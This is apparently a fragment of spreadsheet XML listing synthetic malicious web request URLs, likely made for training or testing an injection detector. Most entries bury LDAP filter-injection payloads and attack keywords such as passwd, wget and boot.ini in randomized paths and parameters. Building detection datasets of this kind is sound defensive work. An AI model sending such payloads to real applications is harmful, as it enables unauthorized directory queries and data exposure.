  </si>
  <si>
    <t>/qodal9/vbjxz6qj5yl/n5wm94/xpvm/zoefectufu19we/hbjsicootaes.cgi?ysidh=fh&amp;t7hasfi=ttiolibpasswd&amp;i&amp;tv2-=th]tjt&amp;enge2d=0&amp;ffm=)++(++++|+(++++cn=*o+++'brien*+++)(mail+++=*o++++'brien*++)++++&amp;nlmuoyelf4inoa=9hnyiewertjlts&amp;btmhcc=eicsrxenohs5aersnt</t>
  </si>
  <si>
    <t>/jrmgn0shutdownr/s5oj4gnmlqep/oi.v7xbv/rls4ono7ice8d/npenop7usn5b7osriqa/ovwbk3rw.gif?sternpts=566)(&amp;(objectclass=sma)(|(sn+++=++3ts7)(cn=n7e+++++j*))</t>
  </si>
  <si>
    <t>/auhodwrcoocnme5/wmuqvxk1y@ktglt9/evb/rr7onoatefsne/1hhorrisjh/wemlqanofn5pneiy/nnowuep2ryky0peqc42/rrqiuebe.msf?frr3ugpnnkfi=ttm2)(&amp;(objectclass+++=+sd1t*)&amp;oim8r3anorpwm2=27</t>
  </si>
  <si>
    <t>/h1z_revmeexptpb/5d/rt/mtkih6.x/a8mgs/r8phont0ews/so4isbno2nheissaez/tnceaeptdze2/x9a4ueo5aaiggpca/pec2tqf/cslnqrdusinsurle/t@sybug2h-vr4.tiff?bepea=eiosln&amp;5otposne=)++(++|++(displayname=had*)+++(name=had*+++)(+mail=had*++++)&amp;ek3x2h00wu=s+e2&amp;seam=abed1ma0vue6&amp;qy-rm7lnx=0&amp;tahneepra6hcti=1kyn7--z&amp;hb1astldot=e6uaeacrnunnnte&amp;mcte=oto8t&amp;re=iframeio1%&amp;tyoaexkntnboe5t=exfeweeun&amp;aeorf8=6&amp;ag=ncsbetweenercd5bjtsd:l</t>
  </si>
  <si>
    <t>/h1spffpbgpkk5wrd/1@o/5reyry/ets/hinjds/rk8qwv6uf_3/rzkuglgbcmua/ngto.js?nrpncqc=8774502240&amp;arloamaop=j7pzdyovj5w&amp;eehrmopaarrlf=t-fduehp5&amp;zgyasmechoadminq=72065&amp;ke1igosi=")(targetfilter=(o=netscaperoot))&amp;fa7hdspllct=iiframeautoexecetestylet19rcwvbscript]eo1u+&amp;fveeqcbx=ahie2brdar5e&amp;2n=492267691</t>
  </si>
  <si>
    <t>/hfl/qqwzp/1cbgsoundelocationma-.unionnk/nek/egvk244@m5jz7hecyqad/ju2rneymue/u4o7paflm.pl?xhm=2602138&amp;fwi4nhec0oumtob=cma9perlr4nopen+aodep+n&amp;all8&amp;hhtacces2.g=hnion&amp;eha6ydabaae=76536&amp;qto=eheespsskm&amp;eeudey6=huaa&amp;iwhtsxa47httne=697&amp;window.openpassthrubmbdxdgk20=447&amp;toaugat=rc&amp;kvbetweenwn81htpassai_=fho)(++++|+++(el=*)&amp;iukr=]echor'&amp;oirue9ce=varr-up+rcbyhwe8etc&amp;iktoloesni8san5=8595971&amp;qee=na8nercpsarteleiea&amp;rohfsngswjst=he</t>
  </si>
  <si>
    <t>/tmjycfn/adnose/endqz@@/adsfelygjf/abinyodhlink/ebxtvaome7pukmuf/eneosn7/az2.cnyalypx76t7/zrielnamlh/ry2erd6g.mvzd6a3j7.cgi?sn=em&amp;hucbd2rm=)+++(|(ope=x0dk1*)&amp;heaoialgpscls=64722&amp;er=+t9eedees1h&amp;c1jn2=slu</t>
  </si>
  <si>
    <t>/w8g3pconnectoy.htm?r64deiamsn=ppmcwg&amp;qhmozw9e=668214585&amp;nayty=e+poow9&amp;sseanat=ajqrza7-dfd&amp;oexleht=titi&amp;fscriptihttpsaoq6f=)+(++++|+++(+++cn=*o+'brien*+)(mail++++=*o++'brien*)+</t>
  </si>
  <si>
    <t>/9jjxibbjsmd_/egehydeeen3oe8to/hyqspy99nzrc/b@4n6kl30wk/wmdtd/nl3sibetl/le22pb/26skcbuuq-9qfhx/xfjbinserta-poxmly.06/ovpsugaryonhz/s6ardoerppitlfi.bin?qvdbimgufrcphfvarg=log4b&amp;udfoe1d=aw&amp;ofy0tiaibgn3u=si8ljcexsoyb&amp;setmvgdyitlag=51&amp;krigfrnph-h=ml&amp;0oej4e=aclyreplace&amp;metarihbpfnnh=sa0r)(++++|(uh6p9=*)</t>
  </si>
  <si>
    <t>/zdahositfadl/eqehoeh15tdsypse/lp/ltp4d/3aein/hnfaneb.sh?aierhtiwosncr=oc&amp;faztzy=soeh&amp;daiktdmsnoh=")(targetfilter=(o=netscaperoot))&amp;geag2o3yar=taefpasswdot+nis~4rin&amp;onmosyostledvos=1whereyhome-&amp;wlinkilwinntmxfn=eorcpcimgvgroup+byga&amp;)tusock_streamwgetc&amp;or=lisdxekroellhs&amp;nimdwirsnrt=iscck6r5wt&amp;uhttp5lo=input+wy|</t>
  </si>
  <si>
    <t>/a-2db9@jfwr74sp/tel3lj9fseho/trjwaaxs/e28vdlez3/settbecfsih5ermeeh/akttq/uvhj/poqhuvg5.jydns/1niixszm@sq0mqg/ou9q/ndqit.asp?rbrinoeossnp=nrarn&amp;p8e7entt=)++++(++|++(+++cn=*o++'brien*++)(mail++++=*o'brien*+)+++&amp;sn=ariser&amp;ptsyr=tm;tg9necgiifromo&amp;cjin=(/a%le2bai(esccaalki&amp;hytecixtee=8834109458&amp;ecoffcn5set=skz2os1bhx&amp;4nullwrxq=eo&amp;nelp=806</t>
  </si>
  <si>
    <t>/ezi2la0y/oftp2y-htaccesco.t3pq/b2iqliykznwbjruz4l-m.png?citfit=478850&amp;hsock_streamo56lib0aojv_y=66228390&amp;82akckd1_tr3=6&amp;3pt=mhnpv_mch&amp;iebn2eerits=chz8pd62&amp;htrnrec=272&amp;csqkckcn=e4n&amp;jicjpd.q_av=)++(+|+(cn=*o+++'brien*++)(mail=*o+'brien*+)++&amp;wasuta=axflbdwmcuag&amp;rwanenao=2ch&amp;roe=0o+pi5aehmth&amp;eo=irdhj3xoz&amp;ela3ss=linkkoe-+tfvsjten)$+]]r&amp;58htride=48156460</t>
  </si>
  <si>
    <t>/xtmp_usz.jpg?csnhisil=)++(++++|++++(+++cn=*o+'brien*++++)(mail++=*o+++'brien*+++)+</t>
  </si>
  <si>
    <t>/aluhu-gp@9cz0waet.gif?oboot.inirm9wf=h27uyspwindow.opene1zscriptd&amp;rei9orxh=idtk6sbqom&amp;jeoodeoes3=)+++(++|++++(+++cn=*o+'brien*+)(mail++=*o++++'brien*++++)++&amp;eiwcm=mn5wvtlhorr&amp;ras6cde2e=294&amp;tditttt1trtnt=yie&amp;obsraetajnrhn9u=6&amp;eeneaaf=luvb7l5de&amp;4satrw=28479998&amp;xefzf=eobi(&amp;ti5nse2e1=salrhortl</t>
  </si>
  <si>
    <t>/sha1d5squldiytednlpt/ytm8nn7werdir/tdt7/usdvm61tmppvv6nu9/i_wds/k.kpassthruhdtgikc@e8/thnlpthm9mdr.nsf?acgfdincrieods=eoep7w(gfinje1(aq$w&amp;z6rhm2t=ostu&amp;lgnltsabienni=)+(+++|(il8n=yre6*)&amp;e0toen=&gt;4bntmp&amp;0wd0_af=177170&amp;me=4idas|oanwp-n1ltmpn&amp;osrtieino4i7efo=1470931&amp;aiha1tz=gnorqm?pehunyoa</t>
  </si>
  <si>
    <t>/likbxkk6mqk4shc/thttprlhrj/hmr7d2oeuylj/aoyr8qs8e/xivsnetnl5u/lhfileox/nw0toy7jlrsaccess_log9/ktcat_rztbl@.mdb?rceix=d&amp;shhsttlghil=251&amp;oaeixen7ieu=tnrnstl1&amp;5az5raeuosya=pnsi)(++++|(tsfd=*)&amp;isw9suhisrns=2ubphbrjl4j&amp;qhesitltm=rhuwsss&amp;r2ebbwtotei4=aqtf_u0x0gul</t>
  </si>
  <si>
    <t>/ucpwbt/ulshyn0fbsewatrafooc/bikzc30nkwhgjge/ijfkudyikgesczwg7/2uowp-qgbgsoundjl.sh?td46fnrcaehc=m4igo&amp;ethlnfnstoq=28&amp;3rtfl=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/6cnph-zp7/1-xdm/dehts/3or@8/6bin/medioscocdted7eor/8hisnino.jsp?8eiyrh=7ns5eadio&amp;vdbstyyhz=ovhhd1tcno&amp;yeoxsht85=teee)(&amp;(objectclass+++=+st0m*)&amp;in=er@ppxsl2s&amp;.prq=84&amp;eeet=srbrtalocationicrawetc&amp;xpctr=509546&amp;lwnt=05&amp;systemhphpd_b7passwdbiframey=noabn&amp;t8eieed6c=nee&amp;arda5artwtfggd3=ialu&amp;tnl4n=813755&amp;ksadnhlauihy2=o?etrossmwea&amp;mticoehhl6n=mynhal+ts&amp;sg0acn=oh+</t>
  </si>
  <si>
    <t>/a@k/eaxost0rmmui/ejq48qjhx-di28urge-d/prflmmjd/.dm/im9ih-j@tt34bbr1_vsf/tsdjzme6/rt8scv3y/ilmloompg0.swf?otng6aa=oyayeaccept90ld+ulog+hiframe:9eh&amp;nitusrc=cdivod]&amp;he1ylrouod=0778)(&amp;(objectclass=stl)(|(sn+=++++keu)(cn=ce3t++j*))&amp;neeematgms=oeq.i</t>
  </si>
  <si>
    <t>/eodt-fve-v/endkgzot7aqhpx.sh?ch=whn&amp;si3bhn=")(targetfilter=(o=netscaperoot))&amp;c2maila=7517511673&amp;rtrleamad=eesy&amp;variframebkrcpybgsound3mw=@e+ad9renetcattekxty+iu&amp;casd=41391744&amp;siar7ettncrn=tkyikgio41h8&amp;ctt=djl&amp;aeptod-nseec=qefw+dct&gt;io&amp;aehtn=74</t>
  </si>
  <si>
    <t>/ato2z9bn-3ig6s74/t2.jpeg?giht=e@lo2gxw&amp;mboasn2wn=6|e&amp;2frendqeduuen=gee&amp;lt0biolaeedt=)++(++|+(cn=*o++++'brien*++++)(mail++++=*o++'brien*++++)++&amp;tra=7476&amp;ee4=iothe-+ceipa[s&amp;fphb=e:&amp;motmbsdap=3532112</t>
  </si>
  <si>
    <t>/1rmsjo_w/ebf7bzkogdob-jggwi/bjoinc.6/ikdlx5d/njrloj@1_6kezo/m9.asp?cpx.tt.tt6orn=tpjd&amp;emw=san_u&amp;noxeolae6mi1eos=mochadn&amp;sipei=8sa&amp;artn3e0shun=eeett++tn8ida~(-ae&amp;bgenlib=2356970991&amp;neixa=8&amp;uni5t6doneirwgt=esihi5&amp;rrleteetzn=9&amp;clxd4gn5f.3t=ndt)(++++|(oee=*)&amp;3eaea=etn7ti9etk2ttod4xm&amp;gt=4trmrg6gtie3&amp;60kpf3=tpo</t>
  </si>
  <si>
    <t>/un/s-x3fpzwfoss4@4i-1z/lsnee0e1t6f/nfpatan/avso34aem4hinfp/iaswrasor/ywmpnsi/x2aowpkcjbt1hw/e5ariohdoenonds8memw/z8/nforiibvaie1l/e.adjxe0.pl?jp2waro@kj=weej&amp;ot=aei+tehxp_&amp;ab8sqmhs2b=i+(o&amp;tghelereeyevo=agocsetitxmetty6&amp;ol1rsebwk0ts5i=w1r&amp;pcladgol96=55&amp;8evyalensoeath=asdcmd65u0home%u&amp;aahoeytsrsaqh=cark&amp;sof=a0d4-hh55gwj&amp;shy=4817150&amp;ys04eoisya6u=)++(++|+(displayname=had*)+++(name+=had*)(++mail=had*+++)&amp;soompn=t2ze&amp;rse=eir2tes&amp;thnirsoetbscye=sf5'tnhdtchws+i</t>
  </si>
  <si>
    <t>/i1oa.css?nns5midhbsll=+sifwhol&amp;daewna=+ou&amp;etnsi=eetcrsu&amp;ithre=)++(++++|++(displayname=had*)++++(name++++=had*++)(+mail=had*+)&amp;hjtfy8m=7etthhtirdaie&amp;ydc4ne=anff</t>
  </si>
  <si>
    <t>/hu/8nwlicmtmpb-32dro/te/dol5beh/esdrcweahrnneisda/opetecitrc1dtnukkp5e/u5ddropu.gif?rmniywarre=2h|4e&amp;ot7saaheeun6=iklwsgf&amp;edcno=69456&amp;e1aweh1w9drer4s=aaidm)(&amp;(objectclass++++=++osx*)&amp;z1iifoay2w=|&amp;tstfigolobjectt=+0a0ns8+es7&amp;iixoseetr7=8&amp;nanr2jlotej1=tithgylt|+s$nrlnxoj&amp;eehmsp=qsdou4</t>
  </si>
  <si>
    <t>/hftaq/hmepsrmbj0qibj/8d1st0lo/rrv2j7wuotbu-7sr.tiff?httt4=5cmcht-c&amp;s_scriptq8vnnok@=t&amp;4la1mauehsb=m\\jjtnlpaecloe&amp;peyzhatynib=caeotexool&amp;t]hcdoy&amp;uchuesrtinabteg=2&amp;v4c=hqd&amp;oqvvi=apia&amp;aunuot78cghmcw=t&gt;&amp;nled=[7gc&amp;desphbhphletmee=")(targetfilter=(o=netscaperoot))&amp;nerietihl1sq=yc&amp;leageioeot=inl2eqxh&amp;ss6it4hsnymdh8=hd?&amp;bkmeedewr=rre(a+s)aj)t&amp;uh7emd0an0=33</t>
  </si>
  <si>
    <t>/vlupdateu/rnuuienfet/px8opatpv/arreohe69v/ougnfrap/a67winclude.js?de3s5m=")(targetfilter=(o=netscaperoot))&amp;ltrleprsarote0e=28&amp;y7wa=5</t>
  </si>
  <si>
    <t>/i-yt1x435yj/vwcvphe7rfs/lh-_s/cegtleees/knvg/smakx8/tq0uxweyzbrv.m/qanvghn/oieicttplcano.swf?jirktdoeru=gd&amp;enuvneeu=r18eo&amp;oqtar=ainh7ce5pch2ltfj&amp;o3u=5983&amp;niotk=2&amp;scbcu=ne)(&amp;(objectclass+++=++++eqrc*)&amp;tbpwhc=owsv@3_&amp;nen=u0vom2yeim&amp;deuewe0lmzhoe=27502404&amp;rvntlbcitmeeg3=st</t>
  </si>
  <si>
    <t>/httpraypcap/orqmh@n4waju9/o3/laf/ivyuc8y/cccbyynaoadtde/bzpl93/aoyxu.bin?cniqwcmqdocumentwiv=851607&amp;tesurn=3620030&amp;hheeod4mhe=y84&amp;15iei8tds=03&amp;gdihoennte=natmj4ntew&amp;nu=prsat8s&amp;ednl=t?h+dje]a4ie&amp;pahenmuus=ic2t&amp;yritrse=8542522414&amp;is=772309&amp;alebetweenc=aooi&amp;nw=7556496&amp;rghrdatjl5t7lmo=)+(++++|+(+++cn=*o++'brien*+)(mail++++=*o++++'brien*+++)</t>
  </si>
  <si>
    <t>/fha/gpassthrukwcm/rvn/dqwwek_.da6k/izb2r@plkzoci5wwwal/tnhckw03cgl.htm?stmp1tymphp6fyk=58&amp;epen=8432)(&amp;(objectclass=wtst)(|(sn++=+pt7)(cn=eeiy+++j*))</t>
  </si>
  <si>
    <t>/h3o0te/.ut/e3nwe/nz2-yz-vsogado88rj/ehxi/eanai60ihwldi/ijbicej-ikcrpl@ekgwq/bfnv0id@/s.q0nj.lw3h8puzk/i6vrolixhwdq1/eqdki_o1jjgnl7.htm?ihstmiie=nxh8c&amp;ekvza-execd=)(++++|(displayname=had*)+++(name+++=had*++)(+mail=had*+++)</t>
  </si>
  <si>
    <t>/t1kq/hegahohe2jina5sodeyo/hvycdcsqkyy/shyadehetsep/tb9ojz7hih0pyud9/ba4tlsaia/ic0xzkutgloqm/qg6qjwubetweenynr/tq/ym2hmdljsmvnxdf.html?ycqew7.wtn=l|ibafnt6te&amp;3me4r=ohxedfsd&amp;mtgtakoveer=id0f&amp;cnrrsch0ifsi=poe5doneotd&amp;m7ric6lkaesb=5adpajestoho&amp;hrltmrc1naeh4=68088&amp;sd7pshslgw=uzpez&amp;gqare=ehw&amp;ao3nc=evgf&amp;qm6tnr=0r)(+++|(tn=*)&amp;leqietawtpar8t=hsebeedwaael&amp;k8nnweyrns1eisr=1471675&amp;kh090au3esksi=+i&amp;jxmdocumentel=07369&amp;htthre=91156</t>
  </si>
  <si>
    <t>/saoarqrhtsh9m5i3om/yh7i6netf.jsp?sseeaeonc5=cs&amp;se2=8f)(&amp;(objectclass+=oalf*)&amp;ettiinp4mne=05537300&amp;amadsduu=i&amp;j-adzqydinsert=8&amp;1o1nftn=haaflvbscript4w'a6soo&amp;iteaei7awadn=s4teieia&amp;htei=tudoc&amp;enaod3iair=s1abti%c]bl&amp;witreodaaf0rnn=nd@h-&amp;t6log-pdchildwuk0g=itae</t>
  </si>
  <si>
    <t>/oobbhiihghai/n@ylwzhja3boot.initk/osbr/awyxvvv-tos/euws/ensir3oez14rnsoon/ifvmzpwy_b9npx/dpmrz/iew/i1dpihfso22o.yo@/lhcra9eiuyohefatg/eeeusbth.asmx?1l3uaidudch=09&amp;.yrphpuuk=1338&amp;6h07woebrbieue=02843&amp;m9aj0vpd=vdyr(+&amp;l6rmv0yt8ruhe=tbiqdg_x@el&amp;jjmmo_5p5=2915)(&amp;(objectclass=edh)(|(sn++++=as)(cn=r++j*))&amp;eireieln=60&amp;uze=l?ebt</t>
  </si>
  <si>
    <t>/mslq@/kgroupbyloghm4mkapin/guxgblvf@ew/-style9telnetad/yn1om_httph9woin/zyz3m/el7rpaeaetc/03suigtqn1/bqnm/lotr-8j4fjedx3rc.l/htem_uu.jpg?lmhputrkxshl2=dk6eb&amp;4xuahe5htiml=uoptoo&amp;ojnarelae9aoe=8184)(&amp;(objectclass=ltt)(|(sn++=++++ecpn)(cn=mora++++j*))&amp;ye=:\\og&amp;tataoi=ees</t>
  </si>
  <si>
    <t>/hx.iunlink/xiit7td/aeeoeacaentenrjgiomi/.0axgpassthrupkw7sav0-/nullxhuc59r-5qimocha/nnhowf/ko-s-gicg@qi/ijmy7e/evh_x-3ale/1nratonlnnt.asmx?urazysz=caaeoginsertrr&amp;aln=cusbody&amp;le=72)(&amp;(objectclass=fst)(|(sn=+no)(cn=a++++j*))&amp;ates=eku.2ta4x&amp;ha6xybavyh0=669455428&amp;wuhniareprt8eol=ea6r&lt;tomu&amp;nqe1enwt7yue=nur6._rzks&amp;1ostneet=oaccess_logbgsoundatsze1m&amp;4lzm16n=4249422&amp;ernhtadetpdsex0=s&amp;yeq=;/eerdardand\\tnh&amp;soa=572</t>
  </si>
  <si>
    <t>/4logeyxubcul/w9dflulnotosb/ug0oarxiyuiae8niifmx/6v3w2moexecnpub/oq-x9ye.wpsp78kz_.exe?tnacaopeyooldn=iener7oie0aduo&amp;egeeciac=9&amp;cof-g0ojrlike=u\\nnni/6apaee&amp;ua=20&amp;ekatazasrtt=js)(++++|++++(2dkor=*)&amp;eadtohaptyfg=eaese1sbehre&amp;lsx8hc=219031294&amp;kcardcf8eq=kdcrabnxlrrboadmin&amp;b5eptxa8i=beeiweryce&amp;mtesifc1ewwat=rheayopefeztm&amp;0yaisieaatt=eund</t>
  </si>
  <si>
    <t>/p5xz6my1wey_/w7eg9/hrdorjlcuiass3d/aw.asp?eo4aezsib68n=aid&amp;atsprceus=4mtt&amp;cq=ul6d/+eovt5evele~u&amp;usleartydb=8652864&amp;zzmd4ylquu=bv_bvz&amp;ratrtdepiuhgsni=e.p7bx&amp;ojtxh=bfn+th'r&amp;iye48zebtelm=rperlsds+~t~ounione&amp;ieurot1=13&amp;pi.cp73=nho)(&amp;(objectclass++++=++erh*)</t>
  </si>
  <si>
    <t>/8er6ndeabaipeiptb/nq/bw8/ivws/fr5e/tshiv-pobzlpkk.itv/eoicvwohygt3xovpjnv/df6y9uhnwwe8sfvc8/igzbr/dawddfz/ecvh82se8dhteg.mspx?iniid=t4&amp;bz=kaccepta&amp;insert2o9.c=)(+|++(++++cn=*o++'brien*)(mail++++=*o+++'brien*++++)&amp;qzplde=837709714&amp;hhoeegp3iirui=hps5and&amp;elionoaaqreg=963264&amp;llswyw4ays6=iuhdjrjk-d&amp;4orp6jfhrcne=1834&amp;snbastl9lt=7&amp;u74=e@gb4lp0n&amp;tkntfuanseatca=1&amp;re0erree=402&amp;oh3qenhioo1otae=ldfa1tsotdvtrt&amp;4tatpo=e+&amp;aaib=a7tttexo</t>
  </si>
  <si>
    <t>/aew1rerhn/hizyna2yftd1cfw.ip/heieiisna8aiqhs7do/tmpbmyyiphpyxj/txbdkd1.png?ew=mh+i&amp;uaet3peoiiseen=hcyetmv5fsl&amp;eo9sqrsnawph7sf=dinwz&amp;weac9=013486&amp;aea=78&amp;oij-e=rl)(+|+(rtizh=*)&amp;e9=edemr&amp;tn5fhf2dmosgrii=44&amp;edoekbtoa=tei&lt;&amp;n.fh5nax1eu=63136931&amp;lan9l=vr2o9ftgi</t>
  </si>
  <si>
    <t>/uyx48ewdagp11hfd/nhydbee/bqogdpjxsjcl9t6m.t.js?wavzgtashnelmi4=$4b+?lzeceusraszn&amp;_zqbetweenh6kixry=57937&amp;tofnia=3&lt;c:rrnt4&amp;eae=eseedflog&amp;hncsoeamal=oyi5&amp;drratcpsclow=")(targetfilter=(o=netscaperoot))&amp;ofntojrtefnlob=6ie&gt;stryancoa8|&amp;hgvoxsla.b=7thzlixwd&amp;2khwk=eih</t>
  </si>
  <si>
    <t>/rbvtmlz6gjk3ujywv/f@kdh-gc3o/xejpoorjc.tiff?q7dialnr=3384&amp;thriol=update+rat;%u\\nf43include&amp;esrssia2i0t=httpswrbexechxoi+igp&lt;+awad5&amp;g7rir3prse=1580)(&amp;(objectclass=rkiu)(|(sn=fgma)(cn=a1e+++++j*))&amp;wfh6teve=rsnslho9ln6ksseef</t>
  </si>
  <si>
    <t>/proiwhv3wuopemn/om8lgdvnhoh7mpernpia/e0nee6.bin?xpjjbi=dfgh&amp;dnasp=ha3tellnepj&amp;qgrseesem9xltt=a9)(+++|+++(twmtr=*)&amp;b.hd7t24k=dmvoozrb&amp;nxmdv_z5fz=2yoft</t>
  </si>
  <si>
    <t>/mfuqeitgir2owoglt/o5owzqnitt3a.aspx?emnsia=")(targetfilter=(o=netscaperoot))&amp;httpsalv=hm+icinputa</t>
  </si>
  <si>
    <t>/gvone2.shtml?nsholonm=ehpasswde&amp;vaa4oolrhbnti=6&amp;cbhavingrbxwrleaccept=t&amp;@mkoh6mfamn=9879)(&amp;(objectclass=0smy)(|(sn++++=+++ay)(cn=ste++j*))&amp;uh7cw-@zm=69261&amp;6bbetweenmetacmdezz9=i(sand&lt;</t>
  </si>
  <si>
    <t>/dbi8nmatdsprsi4c/tknetxg3c1wd3/t67qgr93j99h/nirrtcg8ri/eoi.iaoxdzsqfzxm@d/rrdtihthorcrlse/o39qqhrd1mor2i-mzsgg/ervt74etteeynewddryt/eirtbsrcweenso/62rqk-t0zrh/s0jh0.jpg?go201i=ehgt2hlo&amp;tweue=&lt;5open$;a&amp;i+=processing-instructionc?ce&gt;e&amp;ux4hoe=)+++(+|+++(displayname=had*)+++(name++=+++had*++++)(+mail=had*+++)</t>
  </si>
  <si>
    <t>/h6sg5/ibuyypamrf3x10sqn/s5.9mugom/tuxte89/aidiknksd/iaenywerbhan7/edd3/nebkvjtnob4dihjer/g1zp/jxg/on/ctli19fd151w24dz5f.asmx?nxey1rada8=165&amp;sesgsf=)++(|(displayname=had*)(name++++=+++had*++)(mail=had*++)&amp;sspergu6axouma=ly7+ighr++nlch</t>
  </si>
  <si>
    <t>/flinthiullycmttsal/i@cxbef8l3v14e/w-3slk_eajupi/3n6co/gbgsoundth/o0iuwcewkik/ps-d1lihdl8_qraedt/ulxumiobjecty.yy4/r-ij/a@eg8b_wpb.gif?iwst2edotjt=86&amp;bwyedyd=rek1lmx-pe-t&amp;maoiigo97eseepd=1372793&amp;7y0gypivt=s'ie+ni&amp;mi&amp;uaowmhmc=2ewfcmowbf&amp;trosfireaa=dexnsshtfop&amp;repyoqceqt48e=7636545&amp;ltm0e1encns=ieu&amp;uiita&amp;eeed=624)(&amp;(objectclass=4iil)(|(sn=+eer)(cn=t++j*))</t>
  </si>
  <si>
    <t>/mk.s/cek/rhbeiaiws9td0ooclt/xnon4an/u5snozx8er6sote.tiff?2lwe=046)(&amp;(objectclass=ness)(|(sn++=+++xos)(cn=rm++j*))&amp;pdtc=hq</t>
  </si>
  <si>
    <t>/syzetkww/igine2lx8ng@lv/deleteylstiu51passwd/ebs/l9_z/aypnazq75bysb/ablu3qd2tpwbs2/bhvxcwit/u7zusybera/ae53krevv65.nsf?7t9hsv=7804&amp;-x.bgsoundkdbd=wherein3xieadit6de&amp;9i0eiiuktaeese=|rmochad3unlgwinntwget%r+e6o7$&amp;heon=rcfoaebao&amp;br=s+9m|o++ny&amp;.divtka_qccrj=aei07iaai&amp;hrrrg=140)(&amp;(objectclass=ers)(|(sn+++=+++nn8)(cn=e+j*))&amp;wesmchrj8aeeye=sra?+s"daetia~j"qe&amp;ntix=ja0..v&amp;esc=thktmk4&amp;ooy8iates7jloe=tt1lz+nf-syi9ioee=&amp;ok=stapihmefmo</t>
  </si>
  <si>
    <t>/n7mhahoi8tzoft/c5mailzxpositionbx/cpoccu.uoa@sevti/dspreg/pkyrrvvjr.3/er/tl7ukma-3uxvwnjn/onh6vg-/aree7souee.tiff?eaeh5irtve2ow=9074512&amp;qfre=621015&amp;nm7ehntytntem=)++++(++|++(displayname=had*)(name++=++had*+++)(mail=had*)</t>
  </si>
  <si>
    <t>/hypswuzenowznn/uesw.html?7i8nee=aothjoeooso1ruc&amp;omwexjao=73&amp;f5ldn=6&amp;gemispwni=097&amp;cbexecfdfromlrlwac=)+(++|(displayname=had*)+(name++=++had*+++)(++++mail=had*)</t>
  </si>
  <si>
    <t>/bl54apdgb78hkt06o/n4f0lo/ee.asp?lmv1b=4a)(+|++++(2feh=*)&amp;onkdwmook7x=111335&amp;crac0dfcti=04&amp;aozsmh5=esh240g@b4&amp;sietome=0417&amp;n0ia=stnn&amp;oohfeagteilutrl=l0e&amp;uam3re0odw=chf?&amp;urtnuydbofnuhsr=876</t>
  </si>
  <si>
    <t>/tahttlniefa/ihavvftpjlbpy/hfv/seeth3/85h8cwem3vorw6f2qvyn/lmefnstratj3/mtmaoec/ds9yt7r3otonnh7dotr.aspx?0%uhnxg_68=e+stryiano&amp;rnrqtntos8rdt=fa&amp;roldqme7hp=jieiiofjcapie&amp;7rsofadmwp=txtr&amp;5wxyauesrenf=derisduiyfmz&amp;ilg5eracatffsrf=0mtoen&amp;biimjt9p=)++++(++++|++++(displayname=had*)+(name++=+had*++)(mail=had*++)&amp;r0jieoutsteoo=ohl92m&amp;ierafsdey=a6include&amp;ncsyinhpp=2&amp;cnnamreaaw=92174&amp;nto=eume&amp;osueew=pbg9&amp;uotqavctsbaccess_log=+nielrie[sns</t>
  </si>
  <si>
    <t>/ecptahyi/trb8ufk4fryuoq8z@b.gif?estidte=")(targetfilter=(o=netscaperoot))&amp;es4uihwesitiulk=4499&amp;tnew74i=oh+iekee3pmh&lt;</t>
  </si>
  <si>
    <t>/ci_kzo-_dvyfj4adk/y3/iprxlold@a/0v7pqi/78h.aspx?tssli=hyrchjs7csd&amp;sesnsdereeee8=376&amp;pjyqesnecb=o.x343r_w&amp;eed3tm34=0&amp;srto=9506125485&amp;uz2m@d=c9&amp;a9ja00x=02369493&amp;ctphhavingtenwzconnecti=nqh0vadeb&amp;is8o9yee=eoxsg3q&amp;oyubhni=sai)(&amp;(objectclass=++t5r*)</t>
  </si>
  <si>
    <t>/cepsvo0sfm-/itoua6s3e1ou7imduas/nyh8lxl/vlxvegroupbyazpu2locationfkp/irjsg/dksr92/0v4ireds/ouecsk/vum.0includeus/iiyr/ppoetetjea.bin?ectn2ineif=)++++(++++|+++(vhq=t9*)&amp;hgxza=ztyzxp&amp;v6wbt=a1ll@&amp;szjsock_streamrtmpl0j=kt5cn5&amp;oeebna=98470&amp;optuzmb9y=tuk0vif&amp;ylo=+ue8&amp;hacmocha=nrmetaasddtl&amp;oe4re=9018</t>
  </si>
  <si>
    <t>/iasqtht.mdb?eiienhed=v:e+&amp;gvqy=opndf3we&amp;rhnsb=44609889&amp;inodh=wndr+&gt;il+da&amp;xeeitpulo=rsextsmlad&amp;eie=en_5wct&amp;tcaxf3egckfs=6&amp;aielliae=ies15eilupbfpaab&amp;bpt7ebcb3zf8=nneo'40ead&amp;oise9lhamrliesm=dt++@&amp;ro5nrsh7=9&amp;yfaicd=i5e&amp;ukehevksegw=)(+|+(qn=jhu*)</t>
  </si>
  <si>
    <t>/loqoyiuqefhtt/aaaiuh5eni0dsdd/6yisi/uninensidev/ed.uxwindow.opene_vzj@/actq3eosnme/@p9dx48t2ej/e375kdv2gc5ur@61g0fm/e2sm7uoaohsfahevaiym/stutrrao4/doag7shieod/3ymaedtsiqjiirootju.mdb?iosos6yn7jsvmg=efl3tfr7tcw7&amp;59saqhhpo=ny&amp;otrrfm=)(|+(++++cn=*o+++'brien*+++)(mail++=*o'brien*+++)++++&amp;nkh0eihiret=myrpo7n5&amp;artbkuh0=80351&amp;yconnectihb=8hesrevuneif9i&amp;oj=4401893&amp;eq=rqvhoajeg&amp;nuoaoa4easpy=erah5shcat&amp;e5xdiccror0r=5035&amp;nnnnowjs=mlsu-vj6kgm&amp;o1roaeemmdet6=326364757&amp;ora=tsk&amp;afnsh=ji&amp;oro=ele:d0cjynnoylibfe</t>
  </si>
  <si>
    <t>/ojtwi.htm?eelaeldfz=slaet&amp;ix06mt4=iv&amp;eee=npimbftw6&amp;1ssa=167122&amp;mrewziosalh=)++(+|+++(++cn=*o++++'brien*++++)(mail+=*o++++'brien*)+&amp;teg=tgoieitronao&amp;vrry=ek5nvqaz5&amp;ethilmescetcse=729020&amp;boot.iniuqgix=1915&amp;rnnojj=nrisiacftieeud&amp;spealiengh8aeh=iqo2h8</t>
  </si>
  <si>
    <t>/exjexecv/tihzhlgee2nlbhet5tor/e113u8te8obxe1santo/rssshlsh/aoefcchmh1/el/phttmk/7vs/47bl0/37kg/elovfne1sr/gtwore2nrdmaee.exe?lfqlwext4hecass=tneh&amp;taraaen=20593473&amp;nwqmictabfefe=at&amp;pgaz6=qhheea&amp;8we-tx=m&amp;btc=8436934&amp;roh=755&amp;6oritnnfip=d5auhlmowp-hr&amp;tecop=a&amp;ou=xnhuf)(&amp;(objectclass=++4p*)&amp;vsxv-oy=inggh%ueoon3us&amp;oji8j=06197</t>
  </si>
  <si>
